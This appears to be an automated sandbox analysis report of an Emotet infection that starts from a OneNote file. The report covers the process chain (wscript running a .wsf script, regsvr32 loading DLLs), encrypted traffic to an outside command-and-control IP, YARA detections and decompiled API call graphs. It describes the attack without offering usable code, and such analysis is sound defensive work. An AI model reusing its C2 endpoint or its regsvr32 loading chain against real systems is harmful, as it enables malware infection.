                                                                                              Data Ascii: 4000.u{+q4ScRh4tCB]{'Qpd=}E- rYEym;|/bAPdayI7R=#?pjcUK.Ejj%i@x<yx~QB#5apj>'8[ wr<=,yxlyq*)`?C4s7DM{cz;n@<h,qX`|%@EC.uqQ?9q
                                                                                              2023-03-17 08:16:38 UTC296INData Raw: fe 8f dd 11 b1 2d a7 68 da 8d f5 a2 35 2a e2 44 45 4c bc 2f dc 6e c8 62 eb d2 5d e4 b7 ae 3d 2b fa 27 ce 07 be 38 55 28 78 d2 79 ef b9 65 75 62 dc 29 4c 9c 94 f7 b9 7f f5 5f e7 e4 45 37 41 3c 08 6b 65 d0 d5 d1 8e 9d 86 07 11 24 c2 a1 3c 59 bd 2c 14 71 ca 15 cb b7 b2 2e 4f 50 db 07 a0 68 d2 62 61 67 fd 1e d7 94 0e 7d 1b 7b 52 eb 05 67 65 f5 05 5c 6c a5 d0 38 ba e6 14 c5 08 8c 33 62 00 45 e6 52 bc 3f d4 9e 7c b6 57 6b a9 26 e2 25 21 eb 76 e3 34 c4 dc 82 9b 7f fb 1c b3 6a 61 21 51 c3 79 c7 e5 26 28 7b e0 11 ba fe 2c 61 3e f0 01 d0 91 f1 65 39 b4 66 f2 95 a0 fb 8a 22 be 76 17 93 ed 81 33 eb 90 ab 32 c1 7e e1 ba 6d e2 ef 78 f9 a4 c7 6e fd 95 ba 2b a1 a4 d0 39 a2 3c e1 08 c8 fa f5 04 fb 1c e5 35 68 bb 64 d2 cb 70 6c 73 2a e6 45 96 2c bc 3e 77 1e ce 72 cb da 6c
                                                                                              Data Ascii: -h5*DEL/nb]=+'8U(xyeub)L_E7A<ke$<Y,q.OPhbag}{Rge\l83bER?|Wk&%!v4ja!Qy&({,a>e9f"v32~mxn+9<5hdpls*E,>wrl
                                                                                              2023-03-17 08:16:38 UTC304INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:38 UTC304INData Raw: 31 36 30 30 0d 0a 39 9a 3d 2b 65 8d 41 43 56 87 71 78 48 fa 3e 68 e8 d2 51 42 7c bd 33 62 eb a3 63 64 7d 8f 53 26 19 c1 44 53 78 cb 67 39 63 dd 71 62 3a b4 35 74 6d d8 3e 59 40 9f 30 21 92 ba 34 48 af c1 69 00 a5 9c 35 7a 54 d9 45 37 f4 f0 2a 6b 6d c6 3f 2b c4 9d 41 43 49 d6 73 78 84 a6 3c 68 d1 21 50 42 28 e8 31 62 8f 00 60 64 3c 78 52 26 89 94 46 53 24 69 64 39 9a 2e 70 62 99 e0 37 74 d9 7d 3d 59 28 6e 31 21 bd e1 36 48 27 64 6a 00 c1 63 34 7a af 85 47 37 e4 54 29 6b 27 31 3e 2b 5d c2 43 43 71 7c 70 78 f5 51 3d 68 28 85 53 42 f8 40 32 62 04 0a 60 64 15 de 51 26 35 3d 45 53 a3 60 64 39 6f 8b 73 62 cd 48 34 74 28 75 3d 59 10 cc 32 21 0d 4f 35 48 1a 6c 6a 00 e9 c5 37 7a 7f 28 44 37 1e 5c 29 6b 79 99 3d 2b 2d 6d 40 43 1b 64 70 78 10 f9 3e 68 00 31 50 42 f2
                                                                                              Data Ascii: 16009=+eACVqxH>hQB|3bcd}S&DSxg9cqb:5tm>Y@0!4Hi5zTE7*km?+ACIsx<h!PB(1b`d<xR&FS$id9.pb7t}=Y(n1!6H'djc4zG7T)k'1>+]CCq|pxQ=h(SB@2b`dQ&5=ES`d9osbH4t(u=Y2!O5Hlj7z(D7\)ky=+-m@Cdpx>h1PB


                                                                                              Session ID: 1
                                                                                              Source IP: 192.168.2.3
                                                                                              Source Port: 49687
                                                                                              Destination IP: 182.162.143.56
                                                                                              Destination Port: 443
                                                                                              Process: C:\Windows\System32\regsvr32.exe

                                                                                              Timestamp: 2023-03-17 08:17:34 UTC
                                                                                              kBytes transferred: 310
                                                                                              Direction: OUT
                                                                                              Data:
                                                                                              POST /qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Length: 0
                                                                                              Host: 182.162.143.56

                                                                                              Timestamp: 2023-03-17 08:17:36 UTC
                                                                                              kBytes transferred: 310
                                                                                              Direction: IN
                                                                                              Data:
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Fri, 17 Mar 2023 08:16:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close

                                                                                              Timestamp: 2023-03-17 08:17:36 UTC
                                                                                              kBytes transferred: 310
                                                                                              Direction: IN
                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0



                                                                                              Target ID:0
                                                                                              Start time:09:16:08
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_3.one"
                                                                                              Imagebase:0xc40000
                                                                                              File size:1676072 bytes
                                                                                              MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              Target ID:9
                                                                                              Start time:09:16:33
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                                                                                              Imagebase:0x1260000
                                                                                              File size:147456 bytes
                                                                                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                              Reputation:high

                                                                                              Target ID:10
                                                                                              Start time:09:16:38
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll
                                                                                              Imagebase:0xac0000
                                                                                              File size:20992 bytes
                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Target ID:11
                                                                                              Start time:09:16:38
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline: "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll"
                                                                                              Imagebase:0x7ff758390000
                                                                                              File size:24064 bytes
                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.334703858.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high

                                                                                              Target ID:12
                                                                                              Start time:09:16:40
                                                                                              Start date:17/03/2023
                                                                                              Path:C:\Windows\System32\regsvr32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll"
                                                                                              Imagebase:0x7ff758390000
                                                                                              File size:24064 bytes
                                                                                              MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.579427861.0000000001220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high


                                                                                                Execution Graph

                                                                                                Execution Coverage:8.5%
                                                                                                Dynamic/Decrypted Code Coverage:8.9%
                                                                                                Signature Coverage:7.1%
                                                                                                Total number of Nodes:282
                                                                                                Total number of Limit Nodes:8
                                                                                                execution_graph 8532 f44214 8533 f44256 8532->8533 8536 f53988 8533->8536 8535 f444c6 8538 f53a29 8536->8538 8537 f53acc CreateProcessW 8537->8535 8538->8537 8539 180001138 8540 180001141 __scrt_acquire_startup_lock 8539->8540 8542 180001145 8540->8542 8543 1800063cc 8540->8543 8544 1800063ec 8543->8544 8545 180006403 8543->8545 8546 1800063f4 8544->8546 8547 18000640a 8544->8547 8545->8542 8604 1800086f4 8546->8604 8574 180009cd8 8547->8574 8559 180006481 8562 1800086f4 __std_exception_copy 11 API calls 8559->8562 8560 180006499 8561 1800061a4 47 API calls 8560->8561 8567 1800064b5 8561->8567 8563 180006486 8562->8563 8610 18000878c 8563->8610 8565 1800064bb 8566 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8565->8566 8566->8545 8567->8565 8568 1800064e7 8567->8568 8569 180006500 8567->8569 8570 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8568->8570 8571 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8569->8571 8572 1800064f0 8570->8572 8571->8565 8573 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8572->8573 8573->8545 8575 18000640f 8574->8575 8576 180009ce5 8574->8576 8580 1800093bc GetModuleFileNameW 8575->8580 8616 180007e8c 8576->8616 8581 180009401 GetLastError 8580->8581 8582 180009415 8580->8582 8974 180008668 8581->8974 8583 1800091fc 47 API calls 8582->8583 8585 180009443 8583->8585 8590 180009454 8585->8590 8979 18000a5f0 8585->8979 8586 18000940e 8587 1800010b0 _log10_special 8 API calls 8586->8587 8589 180006426 8587->8589 8592 1800061a4 8589->8592 8982 1800092a0 8590->8982 8594 1800061e2 8592->8594 8596 18000624e 8594->8596 8996 18000a088 8594->8996 8595 18000633f 8598 18000636c 8595->8598 8596->8595 8597 18000a088 47 API calls 8596->8597 8597->8596 8599 180006384 8598->8599 8603 1800063bc 8598->8603 8600 180008714 __std_exception_copy 11 API calls 
8599->8600 8599->8603 8601 1800063b2 8600->8601 8602 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8601->8602 8602->8603 8603->8559 8603->8560 8605 180007f30 __std_exception_copy 11 API calls 8604->8605 8606 1800063f9 8605->8606 8607 1800085b8 8606->8607 9000 180008450 8607->9000 8611 180008791 HeapFree 8610->8611 8612 1800087c0 8610->8612 8611->8612 8613 1800087ac GetLastError 8611->8613 8612->8545 8614 1800087b9 Concurrency::details::SchedulerProxy::DeleteThis 8613->8614 8615 1800086f4 __std_exception_copy 9 API calls 8614->8615 8615->8612 8617 180007eb8 FlsSetValue 8616->8617 8618 180007e9d FlsGetValue 8616->8618 8620 180007eaa 8617->8620 8621 180007ec5 8617->8621 8619 180007eb2 8618->8619 8618->8620 8619->8617 8624 180007eb0 8620->8624 8671 180006e28 8620->8671 8659 180008714 8621->8659 8636 1800099b0 8624->8636 8627 180007ef2 FlsSetValue 8630 180007efe FlsSetValue 8627->8630 8631 180007f10 8627->8631 8628 180007ee2 FlsSetValue 8629 180007eeb 8628->8629 8633 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8629->8633 8630->8629 8666 180007b24 8631->8666 8633->8620 8799 180009c20 8636->8799 8638 1800099e5 8814 1800096b0 8638->8814 8642 180009a13 8643 180009a1b 8642->8643 8645 180009a2a 8642->8645 8644 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8643->8644 8656 180009a02 8644->8656 8645->8645 8828 180009d54 8645->8828 8648 180009b26 8650 1800086f4 __std_exception_copy 11 API calls 8648->8650 8649 180009b40 8653 180009b81 8649->8653 8657 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8649->8657 8651 180009b2b 8650->8651 8652 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8651->8652 8652->8656 8654 180009be8 8653->8654 8839 1800094e0 8653->8839 8655 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8654->8655 8655->8656 8656->8575 8657->8653 8660 180008725 __std_exception_copy 8659->8660 8661 180008776 8660->8661 8662 
18000875a RtlAllocateHeap 8660->8662 8680 18000abf8 8660->8680 8664 1800086f4 __std_exception_copy 10 API calls 8661->8664 8662->8660 8663 180007ed4 8662->8663 8663->8627 8663->8628 8664->8663 8689 1800079fc 8666->8689 8703 18000acb8 8671->8703 8683 18000ac38 8680->8683 8688 180008160 EnterCriticalSection 8683->8688 8701 180008160 EnterCriticalSection 8689->8701 8737 18000ac70 8703->8737 8742 180008160 EnterCriticalSection 8737->8742 8800 180009c43 8799->8800 8802 180009c4d 8800->8802 8854 180008160 EnterCriticalSection 8800->8854 8803 180009cbf 8802->8803 8806 180006e28 __CxxCallCatchBlock 47 API calls 8802->8806 8803->8638 8807 180009cd7 8806->8807 8809 180009d2a 8807->8809 8811 180007e8c 52 API calls 8807->8811 8809->8638 8812 180009d14 8811->8812 8813 1800099b0 67 API calls 8812->8813 8813->8809 8855 1800091fc 8814->8855 8817 1800096e2 8819 1800096f7 8817->8819 8820 1800096e7 GetACP 8817->8820 8818 1800096d0 GetOEMCP 8818->8819 8819->8656 8821 18000b4c4 8819->8821 8820->8819 8822 18000b50f 8821->8822 8826 18000b4d3 __std_exception_copy 8821->8826 8824 1800086f4 __std_exception_copy 11 API calls 8822->8824 8823 18000b4f6 HeapAlloc 8825 18000b50d 8823->8825 8823->8826 8824->8825 8825->8642 8826->8822 8826->8823 8827 18000abf8 __std_exception_copy 2 API calls 8826->8827 8827->8826 8829 1800096b0 49 API calls 8828->8829 8830 180009d81 8829->8830 8831 180009ed7 8830->8831 8833 180009dbe IsValidCodePage 8830->8833 8838 180009dd8 __CxxCallCatchBlock 8830->8838 8832 1800010b0 _log10_special 8 API calls 8831->8832 8834 180009b1d 8832->8834 8833->8831 8835 180009dcf 8833->8835 8834->8648 8834->8649 8836 180009dfe GetCPInfo 8835->8836 8835->8838 8836->8831 8836->8838 8887 1800097c8 8838->8887 8973 180008160 EnterCriticalSection 8839->8973 8856 18000921b 8855->8856 8857 180009220 8855->8857 8856->8817 8856->8818 8857->8856 8858 180007db8 __CxxCallCatchBlock 47 API calls 8857->8858 8859 18000923b 8858->8859 8863 18000b524 8859->8863 8864 18000b539 8863->8864 8865 18000925e 
8863->8865 8864->8865 8871 18000bfb4 8864->8871 8867 18000b590 8865->8867 8868 18000b5a5 8867->8868 8869 18000b5b8 8867->8869 8868->8869 8884 180009d38 8868->8884 8869->8856 8872 180007db8 __CxxCallCatchBlock 47 API calls 8871->8872 8873 18000bfc3 8872->8873 8874 18000c00e 8873->8874 8883 180008160 EnterCriticalSection 8873->8883 8874->8865 8885 180007db8 __CxxCallCatchBlock 47 API calls 8884->8885 8886 180009d41 8885->8886 8888 180009805 GetCPInfo 8887->8888 8889 1800098fb 8887->8889 8888->8889 8890 180009818 8888->8890 8891 1800010b0 _log10_special 8 API calls 8889->8891 8898 18000caa4 8890->8898 8893 18000999a 8891->8893 8893->8831 8899 1800091fc 47 API calls 8898->8899 8900 18000cae6 8899->8900 8918 18000a0c4 8900->8918 8919 18000a0cd MultiByteToWideChar 8918->8919 8975 180007f30 __std_exception_copy 11 API calls 8974->8975 8976 180008675 Concurrency::details::SchedulerProxy::DeleteThis 8975->8976 8977 180007f30 __std_exception_copy 11 API calls 8976->8977 8978 180008697 8977->8978 8978->8586 8980 18000a3dc 5 API calls 8979->8980 8981 18000a610 8980->8981 8981->8590 8983 1800092df 8982->8983 8985 1800092c4 8982->8985 8984 1800092e4 8983->8984 8986 18000a154 WideCharToMultiByte 8983->8986 8984->8985 8988 1800086f4 __std_exception_copy 11 API calls 8984->8988 8985->8586 8987 18000933b 8986->8987 8987->8984 8989 180009342 GetLastError 8987->8989 8990 18000936d 8987->8990 8988->8985 8991 180008668 11 API calls 8989->8991 8993 18000a154 WideCharToMultiByte 8990->8993 8992 18000934f 8991->8992 8994 1800086f4 __std_exception_copy 11 API calls 8992->8994 8995 180009394 8993->8995 8994->8985 8995->8985 8995->8989 8997 18000a014 8996->8997 8998 1800091fc 47 API calls 8997->8998 8999 18000a038 8998->8999 8999->8594 9001 18000847b 9000->9001 9008 1800084ec 9001->9008 9004 1800084da 9004->8545 9005 1800084c5 9005->9004 9007 180006ef0 _invalid_parameter_noinfo 47 API calls 9005->9007 9007->9004 9033 180008234 9008->9033 9012 1800084a2 9012->9005 9018 180006ef0 9012->9018 
9019 180006f48 9018->9019 9020 180006eff GetLastError 9018->9020 9019->9005 9021 180006f14 9020->9021 9022 180007ff8 _invalid_parameter_noinfo 16 API calls 9021->9022 9023 180006f2e SetLastError 9022->9023 9023->9019 9024 180006f51 9023->9024 9025 180006e28 __CxxCallCatchBlock 45 API calls 9024->9025 9026 180006f56 9025->9026 9027 180006ef0 _invalid_parameter_noinfo 45 API calls 9026->9027 9028 180006f77 9027->9028 9063 18000b558 9028->9063 9034 18000828b 9033->9034 9035 180008250 GetLastError 9033->9035 9034->9012 9039 1800082a0 9034->9039 9036 180008260 9035->9036 9046 180007ff8 9036->9046 9040 1800082d4 9039->9040 9041 1800082bc GetLastError SetLastError 9039->9041 9040->9012 9042 1800085d8 IsProcessorFeaturePresent 9040->9042 9041->9040 9043 1800085eb 9042->9043 9044 1800082ec __CxxCallCatchBlock 14 API calls 9043->9044 9045 180008606 GetCurrentProcess TerminateProcess 9044->9045 9047 180008032 FlsSetValue 9046->9047 9048 180008017 FlsGetValue 9046->9048 9049 180008024 SetLastError 9047->9049 9051 18000803f 9047->9051 9048->9049 9050 18000802c 9048->9050 9049->9034 9050->9047 9052 180008714 __std_exception_copy 11 API calls 9051->9052 9053 18000804e 9052->9053 9054 18000806c FlsSetValue 9053->9054 9055 18000805c FlsSetValue 9053->9055 9056 180008078 FlsSetValue 9054->9056 9057 18000808a 9054->9057 9058 180008065 9055->9058 9056->9058 9059 180007b24 __std_exception_copy 11 API calls 9057->9059 9060 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9058->9060 9061 180008092 9059->9061 9060->9049 9062 18000878c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 9061->9062 9062->9049 9064 18000b571 9063->9064 9065 180006f9f 9063->9065 9064->9065 9066 18000bfb4 _invalid_parameter_noinfo 47 API calls 9064->9066 9067 18000b5c4 9065->9067 9066->9065 9068 180006faf 9067->9068 9069 18000b5dd 9067->9069 9068->9005 9069->9068 9070 180009d38 _invalid_parameter_noinfo 47 API calls 9069->9070 9070->9068 9071 f480cc 9073 f480f3 9071->9073 9072 
f482ba 9073->9072 9075 f5e9e8 9073->9075 9078 f48bc8 9075->9078 9077 f5eab4 9077->9073 9080 f48c02 9078->9080 9079 f48eb8 9079->9077 9080->9079 9081 f48d6f Process32FirstW 9080->9081 9081->9080 9082 180010a8e ExitProcess 9085 180014c90 LoadStringW LoadStringW 9082->9085 9094 1800109d0 LoadCursorW RegisterClassExW 9085->9094 9087 180014cec 9095 180010910 CreateWindowExW 9087->9095 9089 180014d02 GetMessageW 9090 180010ab3 9089->9090 9091 180014d19 TranslateAcceleratorW 9089->9091 9092 180014cfa 9091->9092 9093 180014d2f TranslateMessage DispatchMessageW 9091->9093 9092->9089 9092->9090 9093->9092 9094->9087 9096 1800109a1 ShowWindow UpdateWindow 9095->9096 9097 18001099d 9095->9097 9096->9097 9097->9092 9098 ef0000 9101 ef015a 9098->9101 9099 ef033f GetNativeSystemInfo 9100 ef0377 VirtualAlloc 9099->9100 9104 ef08eb 9099->9104 9102 ef0395 VirtualAlloc 9100->9102 9107 ef03aa 9100->9107 9101->9099 9101->9104 9102->9107 9103 ef0873 9103->9104 9105 ef08c6 RtlAddFunctionTable 9103->9105 9105->9104 9106 ef084b VirtualProtect 9106->9107 9107->9103 9107->9106

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 ef0000-ef029a call ef091c * 2 13 ef0905 0->13 14 ef02a0-ef02a4 0->14 15 ef0907-ef091a 13->15 14->13 16 ef02aa-ef02ae 14->16 16->13 17 ef02b4-ef02b8 16->17 17->13 18 ef02be-ef02c5 17->18 18->13 19 ef02cb-ef02dc 18->19 19->13 20 ef02e2-ef02eb 19->20 20->13 21 ef02f1-ef02fc 20->21 21->13 22 ef0302-ef0312 21->22 23 ef033f-ef0371 GetNativeSystemInfo 22->23 24 ef0314-ef031a 22->24 23->13 26 ef0377-ef0393 VirtualAlloc 23->26 25 ef031c-ef0324 24->25 27 ef032c-ef032d 25->27 28 ef0326-ef032a 25->28 29 ef03aa-ef03ae 26->29 30 ef0395-ef03a8 VirtualAlloc 26->30 31 ef032f-ef033d 27->31 28->31 32 ef03dc-ef03e3 29->32 33 ef03b0-ef03c2 29->33 30->29 31->23 31->25 34 ef03fb-ef0417 32->34 35 ef03e5-ef03f9 32->35 36 ef03d4-ef03d8 33->36 37 ef0419-ef041a 34->37 38 ef0458-ef0465 34->38 35->34 35->35 39 ef03da 36->39 40 ef03c4-ef03d1 36->40 41 ef041c-ef0422 37->41 42 ef046b-ef0472 38->42 43 ef0537-ef0542 38->43 39->34 40->36 44 ef0448-ef0456 41->44 45 ef0424-ef0446 41->45 42->43 48 ef0478-ef0485 42->48 46 ef0548-ef0559 43->46 47 ef06e6-ef06ed 43->47 44->38 44->41 45->44 45->45 49 ef0562-ef0565 46->49 51 ef07ac-ef07c3 47->51 52 ef06f3-ef0707 47->52 48->43 50 ef048b-ef048f 48->50 53 ef055b-ef055f 49->53 54 ef0567-ef0574 49->54 55 ef051b-ef0525 50->55 58 ef087a-ef088d 51->58 59 ef07c9-ef07cd 51->59 56 ef070d 52->56 57 ef07a9-ef07aa 52->57 53->49 62 ef060d-ef0619 54->62 63 ef057a-ef057d 54->63 60 ef052b-ef0531 55->60 61 ef0494-ef04a8 55->61 64 ef0712-ef0736 56->64 57->51 83 ef088f-ef089a 58->83 84 ef08b3-ef08ba 58->84 65 ef07d0-ef07d3 59->65 60->43 60->50 70 ef04cf-ef04d3 61->70 71 ef04aa-ef04cd 61->71 68 ef061f 62->68 69 ef06e2-ef06e3 62->69 63->62 72 ef0583-ef059b 63->72 87 ef0738-ef073e 64->87 88 ef0796-ef079f 64->88 66 ef085f-ef086d 65->66 67 ef07d9-ef07e9 65->67 66->65 77 ef0873-ef0874 66->77 74 ef080d-ef080f 67->74 75 ef07eb-ef07ed 67->75 76 ef0625-ef0648 68->76 69->47 
79 ef04d5-ef04e1 70->79 80 ef04e3-ef04e7 70->80 78 ef0518-ef0519 71->78 72->62 81 ef059d-ef059e 72->81 92 ef0822-ef082b 74->92 93 ef0811-ef0820 74->93 90 ef07ef-ef07f9 75->90 91 ef07fb-ef080b 75->91 110 ef064a-ef064b 76->110 111 ef06b2-ef06b7 76->111 77->58 78->55 96 ef0511-ef0515 79->96 85 ef04fe-ef0502 80->85 86 ef04e9-ef04fc 80->86 97 ef05a0-ef0605 81->97 89 ef08ab-ef08b1 83->89 94 ef08bc-ef08c4 84->94 95 ef08eb-ef0903 84->95 85->78 105 ef0504-ef050e 85->105 86->96 99 ef0748-ef0754 87->99 100 ef0740-ef0746 87->100 88->64 104 ef07a5-ef07a6 88->104 89->84 101 ef089c-ef08a8 89->101 106 ef082e-ef083d 90->106 91->106 92->106 93->106 94->95 103 ef08c6-ef08e9 RtlAddFunctionTable 94->103 95->15 96->78 97->97 98 ef0607 97->98 98->62 108 ef0756-ef0757 99->108 109 ef0764-ef0776 99->109 107 ef077b-ef078d 100->107 101->89 103->95 104->57 105->96 112 ef083f-ef0845 106->112 113 ef084b-ef085c VirtualProtect 106->113 107->88 125 ef078f-ef0794 107->125 116 ef0759-ef0762 108->116 109->107 117 ef064e-ef0651 110->117 118 ef06ce-ef06d8 111->118 119 ef06b9-ef06bd 111->119 112->113 113->66 116->109 116->116 122 ef065b-ef0666 117->122 123 ef0653-ef0659 117->123 118->76 124 ef06de-ef06df 118->124 119->118 120 ef06bf-ef06c3 119->120 120->118 129 ef06c5 120->129 127 ef0668-ef0669 122->127 128 ef0676-ef0688 122->128 126 ef068d-ef06a3 123->126 124->69 125->87 132 ef06ac 126->132 133 ef06a5-ef06aa 126->133 130 ef066b-ef0674 127->130 128->126 129->118 130->128 130->130 132->111 133->117
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334686013.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_ef0000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                • API String ID: 394283112-3605381585
                                                                                                • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                • Instruction ID: 05d8a0d86ab04eb04582b891930be8a17b01b193b271d962b3bd5eb997324429
                                                                                                • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                • Instruction Fuzzy Hash: DA521530618B4C8BCB2DDF18D8856BAB7E1FB94304F14562DE98BD7252DB34E542CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                                • API String ID: 0-383957222
                                                                                                • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                • Instruction ID: e4ae352508d4b5335efad0b4dc8cadd67607de0b636fb5b177a63cee98df66fc
                                                                                                • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                                • Instruction Fuzzy Hash: E3C1CD71519780AFD388DF28C58A91BBBF0FBD4754F906A1DF89686260D7B4D909CF02
